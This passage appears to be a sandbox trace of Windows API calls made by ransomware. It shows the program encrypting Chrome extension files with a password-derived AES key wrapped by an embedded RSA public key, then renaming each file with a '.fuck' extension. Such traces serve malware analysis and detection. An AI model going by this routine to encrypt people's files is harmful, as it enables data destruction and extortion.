lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x29384f8 [0247.560] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0247.560] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0247.561] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x29385b8 [0247.570] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0247.570] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0247.570] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0247.570] GetLastError () returned 0x0 [0247.570] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png")) returned 0x20 [0247.573] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", dwFileAttributes=0x80) returned 1 [0247.574] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.574] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0247.575] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.gsg", dwFileAttributes=0x2) returned 1 [0247.575] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x28d4d60) returned 1 [0247.577] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0247.577] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.577] CryptHashData (hHash=0x29385f8, pbData=0x28cb698, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.577] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x29385f8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2938638) returned 1 [0247.577] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.577] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0247.577] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x28d3ac8) returned 1 [0247.578] CryptImportPublicKeyInfo (in: hCryptProv=0x28d3ac8, dwCertEncodingType=0x1, pInfo=0x2935b90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935bc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935bc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2938438) returned 1 [0247.578] CryptEncrypt (in: hKey=0x2938438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0247.578] CryptEncrypt (in: hKey=0x2938438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ab150*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x28ab150*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0247.578] WriteFile (in: hFile=0x5d54, lpBuffer=0x28ab150*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x28ab150*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0247.579] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0247.586] CryptEncrypt (in: hKey=0x2938638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0247.586] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0247.590] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0247.590] CryptEncrypt (in: hKey=0x2938638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0247.590] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0247.590] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0247.590] CryptEncrypt (in: hKey=0x2938638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0247.590] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0247.590] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x2ac, lpOverlapped=0x0) returned 1 [0247.590] CryptEncrypt (in: hKey=0x2938638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2ac, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2b0) returned 1 [0247.590] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x2b0, lpOverlapped=0x0) returned 1 [0247.590] CloseHandle (hObject=0x5d50) returned 1 [0247.590] CloseHandle (hObject=0x5d54) returned 1 [0247.591] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), bFailIfExists=0) returned 1 [0247.594] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", dwFileAttributes=0x0) returned 1 [0247.594] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.gsg")) returned 1 [0247.595] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.fuck")) returned 1 [0247.596] CryptDestroyHash (hHash=0x29385f8) returned 1 [0247.596] CryptDestroyKey (hKey=0x2938638) returned 1 [0247.596] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0247.597] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0247.597] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0247.597] GetLastError () returned 0x0 [0247.597] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png")) returned 0x20 [0247.597] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", dwFileAttributes=0x80) returned 1 [0247.597] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0247.598] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.598] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.gsg", dwFileAttributes=0x2) returned 1 [0247.599] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x28f5c60) returned 1 [0247.602] CryptCreateHash (in: hProv=0x28f5c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0247.602] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.602] CryptHashData (hHash=0x29385f8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.602] CryptDeriveKey (in: hProv=0x28f5c60, Algid=0x6610, hBaseData=0x29385f8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2938678) returned 1 [0247.602] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.603] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0247.603] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x28d4d60) returned 1 [0247.603] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4d60, dwCertEncodingType=0x1, pInfo=0x2935c60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935c90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935c98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x29386b8) returned 1 [0247.603] CryptEncrypt (in: hKey=0x29386b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0247.603] CryptEncrypt (in: hKey=0x29386b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a2f0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x293a2f0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0247.603] WriteFile (in: hFile=0x5d50, lpBuffer=0x293a2f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x293a2f0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0247.605] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0xa0, lpOverlapped=0x0) returned 1 [0247.607] CryptEncrypt (in: hKey=0x2938678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0xa0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0xb0) returned 1 [0247.607] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0xb0, lpOverlapped=0x0) returned 1 [0247.607] CloseHandle (hObject=0x5d54) returned 1 [0247.607] CloseHandle (hObject=0x5d50) returned 1 [0247.608] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), bFailIfExists=0) returned 1 [0247.612] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", dwFileAttributes=0x0) returned 1 [0247.613] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.gsg")) returned 1 [0247.614] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.fuck")) returned 1 [0247.617] CryptDestroyHash (hHash=0x29385f8) returned 1 [0247.617] CryptDestroyKey (hKey=0x2938678) returned 1 [0247.617] CryptReleaseContext (hProv=0x28f5c60, dwFlags=0x0) returned 1 [0247.617] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0247.617] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0247.617] GetLastError () returned 0x0 [0247.617] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html")) returned 0x20 [0247.617] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", dwFileAttributes=0x80) returned 1 [0247.618] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.621] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0247.622] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.gsg", dwFileAttributes=0x2) returned 1 [0247.622] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x293a510) returned 1 [0247.625] CryptCreateHash (in: hProv=0x293a510, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0247.625] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.625] CryptHashData (hHash=0x29385f8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.625] CryptDeriveKey (in: hProv=0x293a510, Algid=0x6610, hBaseData=0x29385f8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29387f8) returned 1 [0247.625] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.625] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0247.625] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x293aa60) returned 1 [0247.626] CryptImportPublicKeyInfo (in: hCryptProv=0x293aa60, dwCertEncodingType=0x1, pInfo=0x2935d30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935d60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935d68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2938638) returned 1 [0247.626] CryptEncrypt (in: hKey=0x2938638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0247.626] CryptEncrypt (in: hKey=0x2938638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a598*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x293a598*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0247.626] WriteFile (in: hFile=0x5d54, lpBuffer=0x293a598*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x293a598*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0247.628] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x5c, lpOverlapped=0x0) returned 1 [0247.629] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x5c, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x60) returned 1 [0247.629] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x60, lpOverlapped=0x0) returned 1 [0247.629] CloseHandle (hObject=0x5d50) returned 1 [0247.629] CloseHandle (hObject=0x5d54) returned 1 [0247.630] CopyFileA 